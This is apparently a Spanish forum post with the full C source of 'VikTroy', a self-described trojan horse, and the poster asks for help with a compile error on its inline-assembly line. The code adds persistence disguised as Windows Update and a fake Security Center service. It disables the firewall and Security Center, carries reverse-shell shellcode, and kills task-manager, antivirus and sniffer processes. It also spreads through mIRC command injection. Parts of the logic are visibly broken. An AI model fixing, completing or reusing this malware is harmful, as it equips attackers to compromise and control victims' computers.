Código
/* Autor: Coded by Black Ghost Lenguaje: C/C++ Win32 Name: Black ghost Ejecutable: Blackghost. */ #include <windows.h> #include <stdio.h> #include <string.h> #include <winsock.h> #include <stdlib.h> #include <process.h> #include <winbase.h> //#include <sys\types.h> #include <tlhelp32.h> #define CM_PRUEBA 101 #define CM_SALIR 102 #pragma comment(lib, "wsock32.lib") // SOCKET PRINCIPAL SOCKET sck; char RegQueryInfo[] = "reg add HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v \"Windows Update\" /t REG_SZ /d %systemroot%\\viktroy.exe"; char SeCent[] = "net stop \"Security Center\""; char Shared[] = "net stop \"SharedAccess\""; char Reg1[] = "reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\SharedAccess\" /v Start /t REG_DWORD /d 0x4 /f"; char Reg3[] = "reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\wscsvc\" /v Start /t REG_DWORD /d 0x4 /f"; char CreateSrv[] = "sc create wscenter binPath= \"%systemroot%\\system32\\viktroy.exe\" type= kernel start= boot error= ignore DisplayName= \"Windows Security Center\""; LRESULT CALLBACK WindowProc(HWND, UINT, WPARAM, LPARAM); // PAYLOAD unsigned char payload[] = "\x33\xc9\x83\xe9\xb8\xe8" "\xff\xff\xff\xff" "\xc0\x5e\x81\x76\x0e\x4a" "\x27\x98\xb9\x83\xee\xfc\xe2\xf4\xb6\x4d" "\x73\xf4\xa2\xde\x67\x46" "\xb5\x47\x13\xd5\x6e\x03\x13\xfc\x76\xac\xe4\xbc\x32\x26\x77\x32" "\x05\x3f\x13\xe6\x6a\x26\x73\xf0\xc1\x13\x13\xb8\xa4\x16\x58\x20" "\xe6\xa3\x58\xcd\x4d\xe6\x52\xb4\x4b\xe5\x73\x4d\x71\x73\xbc\x91" "\x3f\xc2\x13\xe6\x6e\x26\x73\xdf\xc1\x2b\xd3\x32\x15\x3b\x99\x52" "\x49\x0b\x13\x30\x26\x03\x84\xd8\x89\x16\x43\xdd\xc1\x64\xa8\x32" "\x0a\x2b\x13\xc9\x56\x8a\x13\xf9\x42\x79\xf0\x37\x04\x29\x74\xe9" "\xb5\xf1\xfe\xea\x2c\x4f\xab\x8b\x22\x50\xeb" "\x8b\x15\x73\x67\x69" // w0w "\x22\xec\x75\x45\x71\x77\x67" "\x6f\x15\xae\x7d\xdf\xcb\xca\x90\xbb" "\x1f\x4d\x9a\x46\x9a\x4f\x41\xb0\xbf\x8a\xcf\x46\x9c\x74\xcb\xea" "\x19\x64\xcb\xfa\x19\xd8\x48\xd1\x35\x27\x98\xb8\x2c\x4f\x9a\x23" "\x2c\x74\x11\x58\xdf\x4f\x74\x40\xe0\x47\xcf\x46\x9c\x4d\x88\xe8" "\x1f\xd8\x48\xdf\x20\x43\xfe\xd1\x29\x4a\xf2\xe9\x13\x0e\x54\x30" "\xad\x4d\xdc\x30\xa8\x16\x58\x4a\xe0\xb2\x11\x44\xb4\x65\xb5\x47" "\x08\x0b\x15\xc3\x72\x8c\x33" // r0x "\x12\x22\x55\x66\x0a\x5c\xd8\xed\x91" "\xb5\xf1\xc3\xee\x18\x76\xc9\xe8" "\x20\x26\xc9\xe8\x1f\x76\x67\x69" "\x22\x8a\x41\xbc\x84\x74\x67\x6f\x20\xd8\x67\x8e\xb5\xf7\xf0\x5e" "\x33\xe1\xe1\x46\x3f\x23\x67\x6f\xb5\x50\x64\x46\x9a\x4f\xe6\x61" "\xa8\x54\xcb\x46\x9c" // c0d3d "\xd8\x48\xb9\x90\x90\x90"; //ListaProcesos char *proc_list[]={ "cmd.exe", "taskmgr.exe", "netstat.exe", "tasklist.exe", "taskkill.exe", "avp.exe", "ethereal.exe", "whireshark.exe", "snort.exe", "control.exe", "autoruns.exe", "autorunsc.exe", "tcpview.exe", "ettercap.exe", "firefox.exe", "regedit.exe", "reg.exe" }; // Thread Struct typedef struct thread_struct { char name[250]; HANDLE Thread_Handle; int id; } thread; thread threads[10]; int Comando(char recibido[130]); int CrearThread(char *name, HANDLE Thread_Handle, int id); void Esconder(void); void Reverse(void); DWORD WINAPI pcInfo(LPVOID param); DWORD WINAPI ownMirc(LPVOID param); DWORD WINAPI Pong(LPVOID param); DWORD WINAPI keyLogger(LPVOID param); DWORD WINAPI revShell(LPVOID param); DWORD WINAPI Infectar(LPVOID param); DWORD WINAPI winFuck(LPVOID param); DWORD WINAPI Happy(LPVOID param); int Comando(char recibido[130]); int CrearThread(char *name, HANDLE Thread_Handle, int id); void Esconder(void); void Reverse(void); /*int main(void);*/ DWORD WINAPI pcInfo(LPVOID param); DWORD WINAPI ownMirc(LPVOID param); //DWORD WINAPI Pong(LPVOID param); DWORD WINAPI revShell(LPVOID param); DWORD WINAPI SendProcess(LPVOID param); DWORD WINAPI winFuck(LPVOID param); DWORD WINAPI Happy(LPVOID param); DWORD WINAPI CallChat(LPVOID param); /* int main(int argc, char *argv[]) { char bof[25]; strcpy(bof, argv[1]); return 0; } */ // INDEX int main(void) { HANDLE hThread; DWORD id; WSADATA wsa; struct sockaddr_in mysock; char recvbuff[130]; char *hello = "HEllO"; WSAStartup(MAKEWORD(1, 0), &wsa); sck = socket(AF_INET, SOCK_STREAM, 0); Esconder(); mysock.sin_family = AF_INET; mysock.sin_addr.s_addr = inet_addr("127.0.0.1"); mysock.sin_port = htons(80); //hThread = CreateThread(NULL, 0, Pong, NULL, 0, &id); connect(sck, (struct sockaddr *)&mysock, sizeof(struct sockaddr)); for(;;) { if(recv(sck, recvbuff, 128, 0)>2) { Comando(recvbuff); } Sleep(800); } Sleep(1000); WSACleanup(); return 1; } int Comando(char recibido[130]) { HANDLE hThread; DWORD id; char *pString; if(pString==NULL) { return -1; } pString++; { hThread = CreateThread(NULL, 0, pcInfo, NULL, 0, &id); CrearThread("INFO", hThread, id); Sleep(1000); } { hThread = CreateThread(NULL, 0, ownMirc, NULL, 0, &id); CrearThread("MIRC", hThread, id); } { closesocket(sck); WSACleanup(); } { hThread = CreateThread(NULL, 0, revShell, NULL, 0, &id); CrearThread("SHELL", hThread, id); } { hThread = CreateThread(NULL, 0, SendProcess, NULL, 0, &id); CrearThread("SHRC", hThread, id); } { hThread = CreateThread(NULL, 0, winFuck, NULL, 0, &id); CrearThread("FUCK", hThread, id); } { HWND hWnd; hWnd = FindWindow("ConsoleWindowClass", NULL); ShowWindow(hWnd, SW_SHOWNORMAL); } { HWND hWnd; hWnd = FindWindow("ConsoleWindowClass", NULL); ShowWindow(hWnd, SW_HIDE); } { hThread = CreateThread(NULL, 0, Happy, NULL, 0, &id); CrearThread("HAPPY", hThread, id); } { hThread = CreateThread(NULL, 0, CallChat, NULL, 0, &id); CrearThread("CHAT", hThread, id); } { system("reg add HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v \"Windows Update\" /t REG_SZ /d %systemroot%\\viktroy.exe"); } return 0; } void Reverse(void) { void(*rever)(); *(int *)&rever = (int)payload; rever(); } // Not ShellCode Call /* PROCESS_INFORMATION pinfo; STARTUPINFO sinfo; SOCKET rsck; //WSADATA wsadata; struct sockaddr_in rSock; memset(&sinfo,0,sizeof(sinfo)); //WSAStartup(MAKEWORD(1, 0), &wsadata); rsck = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP); rSock.sin_addr.s_addr = inet_addr("127.0.0.1"); rSock.sin_family = AF_INET; bind(rsck, (struct sockaddr*)&rSock, sizeof(rSock)); rSock.sin_port = htons(666); memset(&(rSock.sin_zero), 0, 8); connect(rsck, (struct sockaddr *)&rSock, sizeof(rSock)); sinfo.cb = sizeof(sinfo); sinfo.dwFlags = STARTF_USESTDHANDLES; sinfo.hStdInput = sinfo.hStdOutput = sinfo.hStdError = rsck; CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, 0, 0, NULL, &sinfo, &pinfo); */ // ThreadGen int CrearThread(char *name, HANDLE Thread_Handle, int id) { threads[c].id = id; threads[c].Thread_Handle = Thread_Handle; return c; } // HIDE void Esconder(void) { HWND hWnd; hWnd = FindWindow("ConsoleWindowClass", NULL); ShowWindow(hWnd, SW_HIDE); } // Arquitectura DWORD WINAPI pcInfo(LPVOID param) { SYSTEM_INFO sysinfo; char allinfo[16]; GetSystemInfo(&sysinfo); if(sysinfo.wProcessorArchitecture==PROCESSOR_ARCHITECTURE_INTEL) { if(sysinfo.wProcessorLevel==3) { } else if(sysinfo.wProcessorLevel==4) { } else if(sysinfo.wProcessorLevel==5) { } } else if(sysinfo.wProcessorArchitecture==PROCESSOR_ARCHITECTURE_PPC) { if(sysinfo.wProcessorLevel==1) { } else if(sysinfo.wProcessorLevel==3) { } else if(sysinfo.wProcessorLevel==20) { } } SetComputerName("xZ-Ownk"); return 0; } // Injeccion de comandos mirc. Gracias a CrowDat por su explicacion :P DWORD WINAPI ownMirc(LPVOID param) { HWND hWnd; char run1[] = "/run VikTroy.exe"; SetForegroundWindow(hWnd); hWnd = FindWindowEx(FindWindowEx(FindWindowEx(FindWindow("mIRC", NULL), 0, "MDIClient", 0),0, "mIRC_Status", 0), 0, "Edit", 0); SendMessage(hWnd, WM_SETTEXT, 0, (LPARAM)run1); SendMessage(hWnd, WM_IME_KEYDOWN, VK_RETURN, 0); Sleep(1500); return 0; } // Pong Conexion Thread /*DWORD WINAPI Pong(LPVOID param) { char *pong="PONG"; for(;;) { Sleep(25000); send(sck, pong, strlen(pong), 0); } return 1; } */ // Reverse Shell Thread DWORD WINAPI revShell(LPVOID param) { Reverse(); return 0; } // Tripode DWORD WINAPI SendProcess(LPVOID param) { HANDLE hlista; PROCESSENTRY32 proceso; char proname[30]; char killer[30]; int ret, i, mok; mok = 0; for(;;) { ret = 0; i = 0; for(i=0;i<17;i++) { ZeroMemory(&proceso,sizeof(proceso)); proceso.dwSize = sizeof(proceso); if ((hlista = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0)) != (HANDLE)-1) /* devuelve estructura con la captura de todos los procesos */ { ret = Process32First(hlista,&proceso); while(ret) { { mok++; } { WinExec(killer, SW_HIDE); } ret = Process32Next(hlista,&proceso); } CloseHandle(hlista); } } Sleep(100); } } /*HKEY hKey; unsigned char direccion[] = "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"; unsigned char proceso[] = "VikTroy.exe"; RegCreateKey(HKEY_LOCAL_MACHINE, "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" , &hKey); RegSetValueEx(hKey, "Microsoft Windows Firewall", 0, REG_SZ, proceso, sizeof("proceso")); RegCloseKey(hKey);*/ // WINDOWS FUCKEd x"DDDDDDDDDDD DWORD WINAPI winFuck(LPVOID param) { __asm { mov eax, offset SeCent push eax call system pop ebx nop nop // Security Center Off mov eax, offset Shared push eax call system pop ebx nop nop // Shared Off mov eax, offset Reg1 push eax call system pop ebx nop nop // Reg1 In mov eax, offset Reg3 push eax call system pop ebx nop nop mov eax, offset CreateSrv push eax call system pop ebx nop nop }// Reg2 In return 0; } // Funcion Feliz DWORD WINAPI Happy(LPVOID param) { int a = 0; char *Texto = " VikTroy: Simple Trojan Horse \n" " http://sincontrol.tomahost.org \n" " Gm Vk Tj Pp \n" " irc-hispano.org #sub_level \n" " by xZR !Sub_Level Security \n"; a = MessageBox(NULL, Texto, "by xZR !Sub_Level", MB_OK | MB_ICONERROR | MB_DEFBUTTON4); for(;;) { if(a==IDOK || a==IDYES || a==IDABORT || a==IDCANCEL || a==IDNO) { a= MessageBox(NULL, Texto, "by xZR !Sub_Level", MB_OK | MB_ICONERROR | MB_DEFBUTTON4); } } return -1; } // Not Avaible DWORD WINAPI CallChat(LPVOID param) { HINSTANCE hInstance, hPrevInstance; LPSTR CmdLine; int uCmd; HWND hWnd; MSG uMsg; WNDCLASSEX wincl; SOCKET chatsock; struct sockaddr_in chsock; wincl.cbClsExtra = 0; wincl.cbWndExtra = 0; wincl.cbSize = sizeof(WNDCLASSEX); wincl.hbrBackground = (HBRUSH) COLOR_HIGHLIGHT; wincl.hCursor = LoadCursor(NULL, IDC_ARROW); wincl.hIcon = LoadIcon(NULL, "icono.ico"); wincl.hIconSm = LoadIcon(NULL, "icono.ico"); wincl.hInstance = hInstance; wincl.lpfnWndProc = WindowProc; wincl.lpszClassName = "VentanaChat"; wincl.lpszMenuName = NULL; wincl.style = CS_DBLCLKS; RegisterClassEx(&wincl); hWnd = CreateWindowEx( 0, "VentanaChat", "Viktroy Talk", WS_OVERLAPPEDWINDOW, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, HWND_DESKTOP, NULL, hInstance, NULL); ShowWindow(hWnd, SW_SHOWDEFAULT); while(TRUE == GetMessage(&uMsg, 0, 0, 0)) { TranslateMessage(&uMsg); DispatchMessage(&uMsg); } return uMsg.wParam; } LRESULT CALLBACK WindowProc(HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam) { switch(uMsg) { case WM_DESTROY: PostQuitMessage(0); break; default: return DefWindowProc(hWnd, uMsg, wParam, lParam); } return 0; }
y por cierto me da error en esta Linea alguna ayudita?
-__asm {